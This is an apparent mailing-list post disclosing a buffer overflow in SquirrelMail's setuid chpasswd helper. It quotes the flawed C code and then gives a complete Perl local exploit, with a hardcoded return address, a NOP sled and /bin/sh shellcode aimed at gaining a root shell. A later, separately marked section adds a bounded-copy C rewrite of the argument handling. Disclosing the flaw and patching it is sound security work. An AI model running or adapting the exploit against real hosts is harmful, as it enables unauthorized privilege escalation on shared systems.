
Re: Squirrelmail Chpasswod bof



In-Reply-To: <20040417193848.GA31925@xxxxxxxxxxxxxxxxx>

Hi
>> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
>can we please see the code for this exploit?

Certainly, but I admire your courage to ask for such a simple one tho :]
Let's take a quick peek at chpasswd.c:
<---snip--->
#define STR_MAX 100
#define MAXLEN 1024

/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];

/* now let's up our privilege without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");

/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]);             /* heh */
sprintf(Old_pw,"%s",argv[2]);   /* heh */
sprintf(New_pw,"%s",argv[3]);         /* heh */

/* some humor */
if(!strcmp(User,"root")){
        printf("The %s user cannot be edited for security reasons.\n",User);
        return 4; //the root user cannot be edited for security reasons
}

/* ..  snip .. */
strcpy(PUser,User);     /* heh! */

/* we all see the problems here, no? */
<---snip--->
Some lame 5-minute code; it should exploit the same thing Matias did:

<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account
# or something on the host, heh. this should be pretty self-explanatory
# - rip
use strict;

my $ret = 0xbffff732;           # ret, worked for me, prolly won't for you. change it.
my $length = 190;               # buffer length for smashing without ruining it
my $eipdist = 144;              # distance to overwrite eip
my $offset = 0;         # offset
my $numnops = 10;               # number of nops?
my $nop = "\x90";               # nop
my $pw = 'heh';         # random string, heh, 3 chars for current $ret

# dunno where this came from, it was just lying there.
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68".
                        "\x68\x2f\x2f\x62\x69\x89\xe3\x52".
                        "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

sub generate_string($$$) {
        my ($r, $o, $len) = @_;
        my $buffer;
        my $i;

        my $new_ret = pack('l', ($r + $o));

        for($i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
        for($i = 0; $i < $numnops; ++$i) { $buffer .= $nop; }
        $buffer .= $shellcode;

        return $buffer;
}

if($ARGV[0]) { $offset = $ARGV[0]; }

print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";

my $evil = generate_string($ret, $offset ,$length);
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end--->

- rip
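A hardened version of the argument handling quoted from chpasswd.c above, added here as an example; it is not code from the original post or from SquirrelMail. The return codes, the `request` struct and the `copy_field`/`parse_request` names are my own; the 50-byte field size and the "root" refusal come from the quoted snippet.

```c
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 50   /* size of PUser[], Old_pw[] and New_pw[] in chpasswd.c */
/* Return codes; constructed for this example, not chpasswd's own. */
enum { REQ_OK = 0, REQ_MISSING = 1, REQ_TOO_LONG = 2, REQ_ROOT = 4 };

struct request {
    char user[FIELD_MAX];
    char old_pw[FIELD_MAX];
    char new_pw[FIELD_MAX];
};

/* Copy src into dst[dst_size] or refuse. Silently truncating a username
 * or password would change what the program acts on, so fail closed. */
static int copy_field(char *dst, size_t dst_size, const char *src)
{
    if (src == NULL) return REQ_MISSING;
    /* src fits only if its terminating NUL lies within the first dst_size bytes */
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL) return REQ_TOO_LONG;
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return REQ_OK;
}

/* Bounded replacement for the sprintf()/strcpy() chain in chpasswd.c. Each
 * argument is checked against the smallest buffer it is ever copied into:
 * User[100] -> strcpy -> PUser[50] let a 60-byte name pass the first copy
 * and overflow the second. Runs before any setuid()/setgid() call. */
int parse_request(int argc, char **argv, struct request *req)
{
    if (argc < 4) return REQ_MISSING;
    memset(req, 0, sizeof *req);
    int rc;
    if ((rc = copy_field(req->user, FIELD_MAX, argv[1])) != REQ_OK) return rc;
    if ((rc = copy_field(req->old_pw, FIELD_MAX, argv[2])) != REQ_OK) return rc;
    if ((rc = copy_field(req->new_pw, FIELD_MAX, argv[3])) != REQ_OK) return rc;
    if (strcmp(req->user, "root") == 0) return REQ_ROOT; /* same rule as the original */
    return REQ_OK;
}

int main(int argc, char **argv)
{
    struct request req;
    int rc = parse_request(argc, argv, &req);
    if (rc != REQ_OK) return rc;
    /* Only here, with validated input, would the real program raise privileges. */
    printf("would change password for %s\n", req.user);
    return 0;
}
```

Validation happens while the process still runs as the caller, so a malformed argument is rejected before any privilege change instead of being copied into a fixed buffer as root.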